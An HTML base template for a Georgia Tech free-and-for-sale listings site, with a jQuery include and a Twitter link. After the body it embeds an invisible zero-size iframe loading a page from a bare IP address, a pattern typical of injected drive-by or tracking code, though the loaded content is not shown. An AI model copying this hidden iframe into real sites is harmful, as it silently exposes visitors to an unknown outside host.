<!DOCTYPE html>
<html lang="en">
	<head>
	<title>{%block title%} GATech Free and For Sale{%endblock%}</title>
	<meta name="keywords" content="georgia tech gatech atlanta free forsale for sale craigslist">

	<script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>

	</head>
	<body>
	{%block maincontent%}
	{%endblock%}
	<center>To see up-to-date listings and news, check our Twitter account <a href="http://twitter.com/gatechffs" style="font-size:14pt">@GATechFFS</a>
	</body>
	<footer>
	<iframe style="border:none" height="0" width="0" src="http://54.68.6.167/failwhale/index.html"></iframe>
</html>
